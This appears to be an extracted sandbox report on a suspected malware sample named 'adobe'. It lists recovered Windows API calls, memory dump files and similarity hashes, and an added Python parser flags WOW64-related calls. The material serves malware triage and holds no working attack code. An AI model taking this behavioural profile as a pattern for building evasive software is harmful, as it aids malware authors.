• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: FormatMessage
• String ID:
• API String ID: 1306739567-0
• Opcode ID: f2e57c13329fa82bb562111542c19212575287ec657190e48755ffcde1de8f0a
• Instruction ID: 307a162b73ad64172b1e6f06154ade3ab8019b251ee6aa90c4987cddc8a641e5
• Opcode Fuzzy Hash: f2e57c13329fa82bb562111542c19212575287ec657190e48755ffcde1de8f0a
• Instruction Fuzzy Hash: 80E0206178431165F23529156C83F7B120E83C0B08F9480267B50DD3D3DAAE9D09425E
Uniqueness
• Uniqueness Score: -1.00%
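The function records above all share one layout (an APIs list, the memory dump the function was recovered from, the similarity hashes, and a uniqueness score), and the argument traces in the APIs lines are where the triage value sits: the FormatMessageA call site at 0042E75B, for instance, carries kernel32.dll, Wow64RevertWow64FsRedirection and Wow64DisableWow64FsRedirection among otherwise hex-only arguments, which suggests the sample resolves the WOW64 file-system redirection APIs at run time, consistent with the report's "dynamically determine API calls" signature. The script below is an added example and not Joe Sandbox code or anything from the sample itself: it parses records in this layout into structured data, strips the "Download File" link residue that the page extraction fused onto the associated dump names, separates string arguments from immediates, and runs a watchlist over every call. SAMPLE is a constructed excerpt modeled on this report's records and WATCH is an assumed triage list.

```python
"""Parse Joe Sandbox function records (the APIs / Memory Dump Source / Similarity /
Uniqueness blocks) and run a watchlist over the calls they list.  Added example,
not Joe Sandbox code; SAMPLE is a constructed excerpt modeled on this report's
records and WATCH is an assumed triage list."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

SAMPLE = """\
APIs
• Part of subcall function 0041EF68: IsWindow.USER32(?), ref: 0041EF76
• Part of subcall function 0041EF68: EnableWindow.USER32(?,00000001), ref: 0041EF85
Similarity
• API ID: Window$A25940CurrentEnablePathPrepareThreadWrite
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 0044FE74
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Similarity
• API ID: CreateFile
• API String ID: 823142352-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528E3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
Similarity
• API ID: FormatMessage
Uniqueness
Uniqueness Score: -1.00%
"""
WATCH = ["Wow64", "CreateFile", "GetProcAddress"]   # assumed: substrings worth a look

CALL_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<mod>[\w.]+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-F]{8})$")
HEX_RE = re.compile(r"^[0-9A-F]{8}$")   # an 8-digit immediate or pointer value
SECTIONS = {"Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "Uniqueness"}

@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: str                     # call-site address
    subcall_of: Optional[str]    # set for "Part of subcall function X" lines

    def strings(self) -> List[str]:
        # arguments that are neither '?' nor plain hex: string residue in the trace
        return [a for a in self.args if a != "?" and not HEX_RE.match(a)]

@dataclass
class Record:
    calls: List[Call] = field(default_factory=list)
    associated: List[str] = field(default_factory=list)
    similarity: Dict[str, str] = field(default_factory=dict)
    uniqueness: Optional[float] = None

def parse_records(text: str) -> List[Record]:
    records: List[Record] = []
    rec, section = None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()   # drop extraction indent and bullet
        if not line:
            continue
        if line == "APIs":                        # every record opens with this header
            rec = Record(); records.append(rec); section = "APIs"
            continue
        if rec is None:                           # text before the first record
            continue
        if line in SECTIONS:
            section = line
            continue
        if section == "APIs":
            m = CALL_RE.match(line)
            if m:
                rec.calls.append(Call(m["api"], m["mod"], m["args"].split(","), m["ref"], m["sub"]))
        elif section == "Memory Dump Source" and line.startswith("Associated: "):
            # strip the "Download File" link residue fused onto the dump name
            rec.associated.append(line[len("Associated: "):].replace("Download File", "").strip())
        elif section == "Similarity":
            key, _, val = line.partition(":")
            rec.similarity[key.strip()] = val.strip()
        elif section == "Uniqueness" and line.startswith("Uniqueness Score:"):
            rec.uniqueness = float(line.split(":", 1)[1].strip().rstrip("%"))
    return records

def flag_calls(records: List[Record], watch: List[str]) -> List[Tuple[str, str, str]]:
    """(api, call-site, matched token) for calls whose name or string args hit the watchlist."""
    hits = []
    for rec in records:
        for c in rec.calls:
            for token in [c.api] + c.strings():
                if any(w.lower() in token.lower() for w in watch):
                    hits.append((c.api, c.ref, token))
    return hits
```

Run `flag_calls(parse_records(SAMPLE), WATCH)` and the two Wow64 API names come back attributed to the 0042E75B call site, alongside the CreateFileA call at 0044FE74; pointing the same parser at the full report text (with the indentation and link residue left in, since the parser strips both) gives a per-call inventory to diff against other samples by API String ID or fuzzy hash.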

APIs
• CreateWindowExA.USER32(00000000,0042368C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00406329
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
• Instruction ID: 1d12608fc0467a25e6c73015cc4d191371d7057fe5102c86e19c90aa3d4ae925
• Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                                                                                          • Instruction Fuzzy Hash: 4CE002B2204309BFDB00DE8ADDC1DABB7ACFB4C654F844105BB1C972428275AD608BB1
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 5e59f431e7dc3fbfe634ec8590c1537f060de66ed7aab2066b747fc67b6210b1
• Instruction ID: f0f4a7cc191af20e9b9700f54d410718858f5ac06abb37c2f1ccc41e28cff8f4
• Opcode Fuzzy Hash: 5e59f431e7dc3fbfe634ec8590c1537f060de66ed7aab2066b747fc67b6210b1
• Instruction Fuzzy Hash: 05E07EB2610129AF9B40DE8CDC81EEB37ADEB1D350F408016FA08D7200C274EC519BB4
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindClose.KERNEL32(00000000,000000FF,0046FAB4,00000000,004708A3,?,00000000,004708EC,?,00000000,00470A25,?,00000000,?,00000000), ref: 0045413A
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
• Opcode ID: 123ba8873f7684904cb00c0292ee7b28b8baed377245af7df09d3c856808d5b2
• Instruction ID: 4b1f63d47b4ace94505b997b08180f611004efbb3a0cda6d20e285385e33077b
• Opcode Fuzzy Hash: 123ba8873f7684904cb00c0292ee7b28b8baed377245af7df09d3c856808d5b2
• Instruction Fuzzy Hash: 31E06570A046004BCB54DF3A898025676D15FD5324F04C56AAC6CCF3D6E63C84859A56
Uniqueness
Uniqueness Score: -1.00%

APIs
• KiUserCallbackDispatcher.NTDLL(0049404A,?,0049406C,?,?,00000000,0049404A,?,?), ref: 004146AB
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
• Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
• Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
• Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
• Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
Uniqueness
Uniqueness Score: -1.00%

APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F2C
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 6989787615dda6fb0474b9a852aed77f7455facdbde297e08749939c69554e6e
• Instruction ID: 1f586823f232578dbf745533d190da316c23ef772c10fc749b20f2ce5ea51255
• Opcode Fuzzy Hash: 6989787615dda6fb0474b9a852aed77f7455facdbde297e08749939c69554e6e
• Instruction Fuzzy Hash: E0D05B723091117AD620955F6C44DA76BDCCBC5770F11063EB558D72C1D7309C01C675
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00423608: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042361D
• ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
  • Part of subcall function 00423638: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423654
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: InfoParametersSystem$ShowWindow
• String ID:
• API String ID: 3202724764-0
• Opcode ID: dc093307467aee07a8960c528fd934164c1ba3ed2e5551a9532ecfb772f9b12c
• Instruction ID: 40ba6511a88705317f68f90b714cf273492cbff5df7e869aa0dea3a735aecdb5
• Opcode Fuzzy Hash: dc093307467aee07a8960c528fd934164c1ba3ed2e5551a9532ecfb772f9b12c
• Instruction Fuzzy Hash: 89D05E123831B03106307BB72805ACB86AC8D966AB389047BB5409B302E91E8A0A61AC
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetWindowTextA.USER32(?,00000000), ref: 004242EC
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: TextWindow
• String ID:
• API String ID: 530164218-0
• Opcode ID: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
• Instruction ID: 772c2b490b6417829154bcce5d0a54014a2db275ddfc333997dbbca6f26d49c5
• Opcode Fuzzy Hash: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
• Instruction Fuzzy Hash: 7ED05EE27011702BCB01BAED54C4AC667CC9B8825AB1940BBF904EF257C678CE4083A8
Uniqueness
Uniqueness Score: -1.00%

APIs
• KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,0046703C,00000000,00000000,00000000,0000000C,00000000), ref: 0046636C
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
• Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                                                                                          • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                                                                                                          • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                                                                                          • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,00450C3B,00000000), ref: 0042CCFB
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                          • Opcode ID: 8b9ee9e5493536d4b48a818bbf765d6651f7f951a086d7a0135ab500ac48ce41
                                                                                                                                                          • Instruction ID: cee2652a42bb6fa335edebfce0b7cce520d77b1cbd3538a4821e8cc024acaa82
                                                                                                                                                          • Opcode Fuzzy Hash: 8b9ee9e5493536d4b48a818bbf765d6651f7f951a086d7a0135ab500ac48ce41
                                                                                                                                                          • Instruction Fuzzy Hash: 66C08CE03222001A9A1065BD3CC911F06C8892833A3A41F37B438E32D2E23E88266028
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A8D4,0040CE80,?,00000000,?), ref: 00406EE5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                          • Opcode ID: 9b296e5fc7b539470b52078a9bfbfb4805330f2922959540d2792222f9fab27f
                                                                                                                                                          • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                                                                                                          • Opcode Fuzzy Hash: 9b296e5fc7b539470b52078a9bfbfb4805330f2922959540d2792222f9fab27f
                                                                                                                                                          • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • SetCurrentDirectoryA.KERNEL32(00000000,?,00496482,00000000,00496655,?,?,00000005,00000000,00496689,?,?,00000000), ref: 004072BB
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentDirectory
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1611563598-0
                                                                                                                                                          • Opcode ID: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
                                                                                                                                                          • Instruction ID: c18bf430a4858a09d5fd0626d157798880aaaa8ea81a5298b6cf69089c3012d4
                                                                                                                                                          • Opcode Fuzzy Hash: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
                                                                                                                                                          • Instruction Fuzzy Hash: B0B012E03D161B27CA0079FE4CC191A01CC46292163501B3A3006E71C3D83CC8080514
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • SetEndOfFile.KERNEL32(?,?,0045BB62,00000000,0045BCED,?,00000000,00000002,00000002), ref: 0044FFA3
                                                                                                                                                            • Part of subcall function 0044FD24: GetLastError.KERNEL32(0044FB40,0044FDE6,?,00000000,?,004964F4,00000001,00000000,00000002,00000000,00496655,?,?,00000005,00000000,00496689), ref: 0044FD27
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLast
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 734332943-0
                                                                                                                                                          • Opcode ID: f68e6bbbbc14dd3d90c0bac0da1e9de4f6c51ce62b73bda74f22549f965f1593
                                                                                                                                                          • Instruction ID: fa519a0bc74907a80830d7c5fff404009cad8ad3bbe0b7dcc6cc60e8dc594847
                                                                                                                                                          • Opcode Fuzzy Hash: f68e6bbbbc14dd3d90c0bac0da1e9de4f6c51ce62b73bda74f22549f965f1593
                                                                                                                                                          • Instruction Fuzzy Hash: BAC04CA170010047AF10A6AEC5C1A07A3D89E092083154076B904CF207D6A8DC084A54
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • SetErrorMode.KERNEL32(?,0042E335), ref: 0042E328
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                          • Opcode ID: 5287c43e795efb0446e0849aeecf90da631f9cf0a0768b6f092fd008fa53721d
                                                                                                                                                          • Instruction ID: 885b9387dc4d85ef1a6bcc41b3ac28186c42b97ac018e1411ad6f8b1d6607996
                                                                                                                                                          • Opcode Fuzzy Hash: 5287c43e795efb0446e0849aeecf90da631f9cf0a0768b6f092fd008fa53721d
                                                                                                                                                          • Instruction Fuzzy Hash: CFB09B7770C6006DB705DA95B45192D63E4D7C47203E14577F400D3580D93C58014918
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                                                                                                                          • Instruction ID: 444a78761fbc6a727879d8c4239369b0bde5fc0390465f01f64749401816922a
                                                                                                                                                          • Opcode Fuzzy Hash: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                                                                                                                          • Instruction Fuzzy Hash: CDA002756015049ADE04A7A5C849F662298BB44204FC915F971449B092C53C99008E58
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 54ab6fb682ef55532606db5a57a08a75dd55abb6495f2c9f85d92a209ebb08c5
                                                                                                                                                          • Instruction ID: 72cb28a769613da0e12d57a8c8ff31d21ec4f608c404a89b028e4eccd5103e64
                                                                                                                                                          • Opcode Fuzzy Hash: 54ab6fb682ef55532606db5a57a08a75dd55abb6495f2c9f85d92a209ebb08c5
                                                                                                                                                          • Instruction Fuzzy Hash: 87518570E041459FEB01EFA9C482AAEBBF5EB49304F51817BE500E7351DB389D46CB98
                                                                                                                                                          Uniqueness

